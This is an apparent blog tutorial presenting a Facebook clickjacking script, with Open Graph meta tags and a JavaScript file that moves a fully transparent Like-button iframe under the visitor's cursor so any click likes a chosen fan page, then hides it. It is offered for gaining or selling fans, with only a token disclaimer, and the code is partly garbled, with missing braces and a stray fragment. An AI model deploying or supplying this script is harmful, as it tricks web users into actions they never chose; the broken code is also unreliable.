Facebook ClickJack Script

Facebook Click Jacking Script is a malicious JavaScript code which is used for hijacking any event from user side, for an instant we can get a click to any button without knowledge of user. These kinds of scripts are very useful in case, where a website owner wants to increase the likes or Google plus for any website.

See what Wikipedia page has to say about Clickjacking:

Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different to what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

Facebook ClickJacking Script

Few of facts about Facebook ClickJacking Script :

  • The user clicks anywhere on page leads to a like on fan page and thus help in increasing fans/followers on any fb page.
  • You can either set your own website’s fan page or any other Facebook fan page, thus if you have good number of visitors you can sell Facebook fan page.
  • Little more tweaked can help you in getting geo targeted uses for a Facebook Page.
  • Once the use has liked fan page this script hides remaining code so that use doesn’t have any option to unlike fan page.

We use a JavaScript code with Iframe and Iframe code gets hide after a user click event,

Set an Click Jacking script for Facebook

To set a clickjacking script for increasing Facebook fans you need to follow 2 basic steps

Step 1: code to be inserted between <head></head>

For setting clickjacking script for any page you need to use “The Open Graph protocol”. Insert the below code before your </head> tag.

<meta property=”fb:admins” content=”ADMIN ID HERE” />
<meta property=”og:type” content=”website” />
<meta property=”og:image” content=”http://complete Image Path” />
<meta property=”og:description” content=”description which is shown while sharing page with others” />
<meta property=”og:site_name” content=”put your tagline here” />
<meta property=”og:url” content=”http://yourwebsiteurl.com/”/>
<meta property=”og:title” content=”LINK TAG!”/>

More information about open graph protocol can be found at http://ogp.me/
For finding admin Id of any page you can open http://graph.facebook.com/YourFanPageUrl
For example: http://graph.facebook.com/ktechies You will find id of page in first row.

Step 2:
Create a JavaScript file with name “fblikes.js” and upload it to your hosting services. Remember to keep the “.js” extension of file.
Content for fblikes.js

var tempX = 0,

tempY = 0,

IE = document.all ? true : false;

if (!IE) document.captureEvents(Event.MOUSEMOVE);

var like = document.createElement(‘iframe’);

like.src = ‘http://www.facebook.com/plugins/like.php?href=’ + encodeURIComponent(‘http://facebook fan page url /’) + ‘&layout=standard&show_faces=true&width=53&action=like&colorscheme=light&height=80′;

like.scrolling = ‘no’;

like.frameBorder = 0;

like.allowTransparency = ‘true’;

like.style.border = 0;

like.style.overflow = ‘hidden’;

like.style.cursor = ‘pointer’;

like.style.width = ’55px’;

like.style.height = ’25px’;

like.style.position = ‘absolute’;

like.style.opacity = .0; //Would be 0 if really used


window.addEventListener(‘mousemove’, mouseMove, false);



window.removeEventListener(‘mousemove’, mouseMove, false);

}, 10000);

function mouseMove(e) {

if (IE) {

tempX = event.clientX + document.body.scrollLeft;

tempY = event.clientY + document.body.scrollTop;

} else {

tempX = e.pageX;

tempY = e.pageY;


if (tempX < 0) tempX = 0;
if (tempY < 0) tempY = 0; like.style.top = (tempY – 9) + ‘px’;
like.style.left = (tempX – 25) + ‘px’;

return true



you need to include this JavaScript file “fblikes.js” anywhere in between <body> </body> tags.

In this Javascript file you can manage the opacity of like button, to make it 100% trasperent, you should set opacity to 0.

Disclaimer: In any case, you should not use this kind of ClickJacking Scripts to increase either facebook fans/followers or to increase Google Plus. we will not be responsible to any damage caused by this script, you should take backup of your hosting files before making any changes to them.

You may subscribe for more updates regarding Facebook ClickJacking Scipt, your feedbacks are welcomed

Be the first to comment

Leave a Reply

Your email address will not be published.